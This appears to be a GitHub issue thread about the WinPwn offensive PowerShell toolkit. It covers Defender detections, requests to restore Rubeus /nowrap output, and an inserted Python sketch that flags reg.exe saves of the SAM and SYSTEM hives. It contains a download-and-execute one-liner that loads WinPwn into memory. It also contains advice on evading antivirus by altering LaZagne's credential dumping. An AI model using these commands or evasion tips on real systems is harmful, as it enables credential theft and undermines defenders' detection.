Closed sp00ks-git closed 3 years ago
Whoops, I'll add it again. Domainpasswordspray is also broken atm. Gonna do that tomorrow 👌
Give e9db01a3f0b8479570e076140d2ac1134766bfde a try and tell me if it's fixed. LaZagne is also replaced, but its signature won't last long, as always with public tools. It's better to build your own customized version.
Thanks man.
Just tested on a win10 box and it's detected immediately by Defender. See screenshot attached. Interesting that it is more about behaviour than the file itself. This is a similar message I'm getting for my custom mimikatz file. Maybe they have updated Defender to look more at behaviour.
One of the first things LaZagne does with the "all" parameter is dumping SAM and SYSTEM hives from the registry to get the SAM-Database credentials. Maybe that is detected, I found many AV/EDR vendors looking for that behaviour in the past. The only method to avoid the detection is to remove the SAM/SYSTEM dump from LaZagne and use for example InternalMonologue for the hashes instead. But I'll leave that up to you ;-)
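Added example, not part of the thread or of WinPwn/LaZagne: a sketch of the behavioural rule the comment above says AV/EDR vendors apply, run over constructed process-creation events. It assumes the hives are dumped with `reg save` command lines; the event tuple layout and the 60-second window are assumptions of this example.

```python
import re
from collections import defaultdict

# Constructed process-creation events: (host, parent PID, epoch seconds, command line).
EVENTS = [
    ("ws01", 4120, 1000, r'reg.exe save hklm\sam C:\Users\Public\a.tmp'),
    ("ws01", 4120, 1002, r'reg.exe save HKLM\SYSTEM C:\Users\Public\b.tmp /y'),
    ("ws01", 4120, 1003, r'reg.exe save "HKLM\SECURITY" C:\Users\Public\c.tmp'),
    ("ws02", 880, 1000, r'reg.exe query HKLM\SYSTEM\CurrentControlSet\Services'),
    ("ws02", 880, 1010, r'reg.exe save HKLM\SOFTWARE\Vendor D:\backup\vendor.hiv'),
    ("ws03", 77, 1000, r'reg save HKEY_LOCAL_MACHINE\SAM C:\t\s'),
    ("ws03", 77, 5000, r'reg save HKLM\SYSTEM C:\t\y'),
]

# Matches a save of a whole credential-bearing hive, not of a subkey beneath it.
HIVE_RE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?(?:hklm|hkey_local_machine)\\'
    r'(sam|system|security)(?=["\s]|$)',
    re.IGNORECASE)

WINDOW = 60  # seconds; assumed correlation window


def hive_saved(cmdline):
    """Return the hive name (upper case) if the command saves it, else None."""
    m = HIVE_RE.search(cmdline)
    return m.group(1).upper() if m else None


def detect(events, window=WINDOW):
    """Group hive saves by (host, parent PID) and grade each group."""
    seen = defaultdict(list)  # (host, ppid) -> [(timestamp, hive)]
    for host, ppid, ts, cmd in events:
        hive = hive_saved(cmd)
        if hive:
            seen[(host, ppid)].append((ts, hive))
    alerts = []
    for (host, ppid), hits in sorted(seen.items()):
        sam = [t for t, h in hits if h == "SAM"]
        system = [t for t, h in hits if h == "SYSTEM"]
        # SAM hashes are only usable offline together with the boot key in SYSTEM,
        # so both hives saved by one parent in a short window is the strong signal.
        paired = any(abs(a - b) <= window for a in sam for b in system)
        alerts.append({"host": host, "ppid": ppid,
                       "hives": sorted({h for _, h in hits}),
                       "severity": "high" if paired else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Keying on the command line and parent process rather than on a file hash is why a rebuilt or renamed binary still triggers the rule.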
Thanks for the support all good now. Can confirm that /nowrap is sorted also.
Yo! Just rechecked option 8 from the menu for kerberoasting and the output loses the /nowrap again, can you update?
For clarity: I downloaded winpwn in memory using:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
Selected option: 8
Viewed output: "Kerberoasting_Rubeus.txt"
Fixed with 3ab6c6c0fcc91f8f98ed2df1de17c7a0592342fb. Only fixed it for the Offline version last time.
Could you re-add /nowrap to the ASREP and Kerberoasting options please! Seems to have gone on at least the offline version.
I find the offline version very useful and use it more often as limited access to the internet is a usual position I'm in.
Thanks!